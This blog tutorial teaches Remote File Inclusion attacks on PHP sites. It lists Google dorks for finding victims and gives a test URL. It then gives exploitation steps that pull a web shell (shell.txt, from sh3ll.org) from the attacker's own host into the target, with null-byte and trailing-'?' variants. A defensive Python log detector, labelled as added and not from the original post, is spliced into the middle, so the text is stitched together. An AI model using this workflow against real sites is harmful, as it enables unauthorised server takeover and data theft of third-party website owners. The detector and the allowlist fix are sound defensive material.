
What is Remote File Inclusion RFI [Full Tutorial]

Remote File Inclusion (RFI) is an attack that targets the servers that run web sites and their applications. RFI exploits are most often attributed to the PHP programming language, which is used by many large firms including Facebook and Sugar CRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitization. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long-term takeover of the vulnerable server.
The impact can be as minimal as outputting the contents of the file, but depending on the severity it can also lead to, to list a few:
  •  Code execution on the web server
  •  Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
  •  Denial of Service (DoS)
  •  Data Theft/Manipulation
RFI is now a very uncommon vulnerability because of the extensive patches and updates applied to websites.
So let's start with the tutorial, but before reading this tutorial, read the Disclaimer first.
Step I: Find a site that is vulnerable to Remote File Inclusion.
For this you will have to use Google dorks. Some of the dorks look like this:
    inurl:/template.php?pagina=
    inurl:/index.php?pagina=
    inurl:/index.php?inc=
    inurl:/includes/include_onde.php?include_file=
    inurl:/index.php?page=
    inurl:/index.php?pg=
    inurl:/index.php?show=
    inurl:/index.php?cat=
    inurl:/index.php?file=
    inurl:/db.php?path_local=
    inurl:/index.php?site=
    inurl:/htmltonuke.php?filnavn=
(I will give a full, detailed dork list for RFI in upcoming posts.)
Step II: Test a given website for the vulnerability.
After getting the list of websites from the Google search, we have to test each website for the vulnerability. To make this easier to understand, I will give you an example.
Let us suppose we have a vulnerable website, say

 www.vulnerablesite.com

Now we have to add the following keywords to it:

"index.php?page=www.google.com"              (without quotes)

And it becomes:

www.vulnerablesite.com/index.php?page=http://www.google.com

 
Hit Enter. If the resulting page directs us to the Google homepage, then we can say that the website is vulnerable to attack.

Step III: Exploitation of the vulnerability.
After this we have to upload the shell to the target website. For this we have to take a few things into consideration, viz. the shell must be in .txt format (shell.txt), like Locus. You can see the shell page and download shells from www.sh3ll.org. Once we have the shell, we have to upload it to a free hosting service, and the shell page after uploading looks like this:

www.myownwebsite.com/shell.txt
 
After this we have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site:

www.vulnerablesite.com/v2/index.php?page=http://www.myownsite.com/shell.txt

Sometimes we have to use null bytes for it to execute successfully. If we receive an error from "shell.txt", then we have to try "shell.txt?".
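From the defender's side, the request shapes in Steps II and III stand out in web server access logs: a query parameter whose value is an absolute URL, optionally ending in "?" or a null byte. The Python detector below is an added example, not code from the original post; the log lines, the `remote.example` host and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request target inside a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# A parameter value that is itself an absolute URL. Parameters that
# legitimately carry URLs (redirect targets etc.) should be excluded by name.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def rfi_findings(log_line):
    """Return [(param, decoded_value, reasons)] for suspicious query parameters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = match.group(1).partition("?")[2]
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second decode pass catches double encoding
        reasons = []
        if REMOTE_RE.match(value):
            reasons.append("remote-url")
            if value.endswith("?"):  # the trailing "?" variant from Step III
                reasons.append("trailing-question-mark")
        if "\x00" in value:  # decoded %00 null byte
            reasons.append("null-byte")
        if reasons:
            findings.append((name, value, reasons))
    return findings


def scan(lines):
    """Return a list of (line_number, finding) over an iterable of log lines."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in rfi_findings(line)]


# Constructed sample entries; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=http://remote.example/shell.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [10/Oct/2023:13:56:09 +0000] "GET /index.php?page=http://remote.example/shell.txt%00 HTTP/1.1" 500 0',
    '203.0.113.9 - - [10/Oct/2023:13:56:15 +0000] "GET /index.php?inc=http%253A%252F%252Fremote.example%252Fshell.txt HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for lineno, (param, value, reasons) in scan(SAMPLE_LOG):
        print(f"line {lineno}: {param}={value!r} [{', '.join(reasons)}]")
```

A hit is only a lead, since some parameters legitimately carry URLs and need to be excluded by name. Detection does not replace the fix on the PHP side, which is to map the parameter to a fixed allowlist of local files and keep `allow_url_include` set to `Off`.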
Now we are done.
Happy testing and hacking!
Cheers!
If you get stuck anywhere, just let me know via the comments.
Please share the article.


5 comments:

  1. nice post i like it


    http://www.cyberhax.org/

  2. If Error 404 occurs, is it vulnerable or not?

  3. This constantly amazes me just how blog owners such as yourself can find the time as well as the dedication to keep on crafting superb blog posts. Your website is good and one of my personal must-read blogs. I just had to thank you.
    Thanks
    Susanne Green
    medical assistant
